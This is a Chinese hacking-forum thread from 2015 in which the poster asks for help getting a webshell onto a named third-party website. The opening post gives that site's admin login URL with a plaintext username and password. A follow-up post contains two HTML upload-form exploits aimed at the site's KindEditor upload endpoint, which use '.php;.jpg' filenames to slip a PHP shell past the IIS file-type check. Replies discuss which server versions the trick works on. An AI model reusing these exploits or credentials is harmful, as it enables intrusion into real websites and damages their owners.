查看: 3653|回复: 6

phpweb后台拿shell

[复制链接]
发表于 2015-11-18 17:54:33 | 显示全部楼层 |阅读模式
http://lnlyjd.com/base/admin/index.php 账号admin 密码a123456789
手上有几个webshell是后台  IIS7.5的 通过那exp上传 失败。burp抓包的话 返回路径也没有 。
5EH]E(63))LMAVSJVIN4L`7.png
1.png
回复

使用道具 举报

 楼主| 发表于 2015-11-18 17:57:31 | 显示全部楼层
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://lnlyjd.com/kedit/upload_cgi/upload.php">
<input type="text" name="fileName" value="riyurshenjiao.php;.jpg" />
<input type="hidden" name="attachPath" value="news/pics/" />
<input type="file" name="fileData" size="14" /></td>
<input type="submit" name="button" value="确定" />
</form>
以上是我用的exp  是网上找的   下面是另一个   但是同样无果
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://lnlyjd.com/kedit/upload_cgi/upload.php">

<input type="hidden" name="fileName" id="fileName" value="tem1p_jm.PHP;.jpg" />

<input type="hidden" name="attachPath" id="fileName" value="news/pics/" />



<select id="imageType" onchange="javascript:parent.KindImageType(this.value);document.getElementById(‘KE_IMAGEsubmitButton’).focus();">

<option value="1″ selected="selected">本地</option>

<option value="2″>远程</option>

</select>



<input type="text" id="imgLink" value="http://" maxlength="255″ style="width:95%;border:1px solid #555555;display:none;" />

<input type="file" name="fileData" id="imgFile" size="14″ style="border:1px solid #555555;" onclick="javascript:document.getElementById(‘imgLink’).value=’http://’;" /></td>



<input type="text" name="imgTitle" id="imgTitle" value="" maxlength="100″ style="width:95%;border:1px solid #555555;" />

<input type="text" name="imgWidth" id="imgWidth" value="0″ maxlength="4″ style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgHeight" id="imgHeight" value="0″ maxlength="4″ style="width:40px;border:1px solid #555555;" />

<input type="text" name="imgBorder" id="imgBorder" value="0″ maxlength="1″ style="width:20px;border:1px solid #555555;" />

<select id="imgAlign" name="imgAlign">

<option value="">对齐方式</option>

<option value="baseline">baseline</option>

<option value="top">top</option>

<option value="middle">middle</option>

<option value="bottom">bottom</option>

<option value="texttop">texttop</option>

<option value="absmiddle">absmiddle</option>

<option value="absbottom">absbottom</option>

<option value="left">left</option>

<option value="right">right</option>

</select>

<input type="text" name="imgHspace" id="imgHspace" value="0″ maxlength="1″ style="width:20px;border:1px solid #555555;" />

<input type="text" name="imgVspace" id="imgVspace" value="0″ maxlength="1″ style="width:20px;border:1px solid #555555;" />

<input type="submit" name="button" id="KE_IMAGEsubmitButton" value="确定" style="border:1px solid #555555;background-color:#AAAAAA;" /></form>


回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2015-11-18 18:29:40 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

头像被屏蔽
发表于 2015-11-18 19:19:14 来自手机 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 0 反对 2

使用道具 举报

 楼主| 发表于 2015-11-18 21:30:26 | 显示全部楼层
2469234646 发表于 2015-11-18 19:19
这个比,给你满分

我是求助的啊  exp上传失败怎么破?
回复 支持 反对

使用道具 举报

 楼主| 发表于 2015-11-18 21:31:15 | 显示全部楼层
Mrlin 发表于 2015-11-18 18:29
写的不错 不过帖子要再精炼点就更好了  发帖子时要捡重要的写 这样简单易懂 不过新人能发出这样的帖子 也不 ...

可以给个思路吗?
回复 支持 反对

使用道具 举报

发表于 2015-11-19 12:39:16 | 显示全部楼层
expd的使用是有条件的,是分iis6.0和apache的exp,对于iis7.5你怎么用这个exp?也许burp可能帮你解决。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 03:52 , Processed in 0.027608 second(s), 16 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部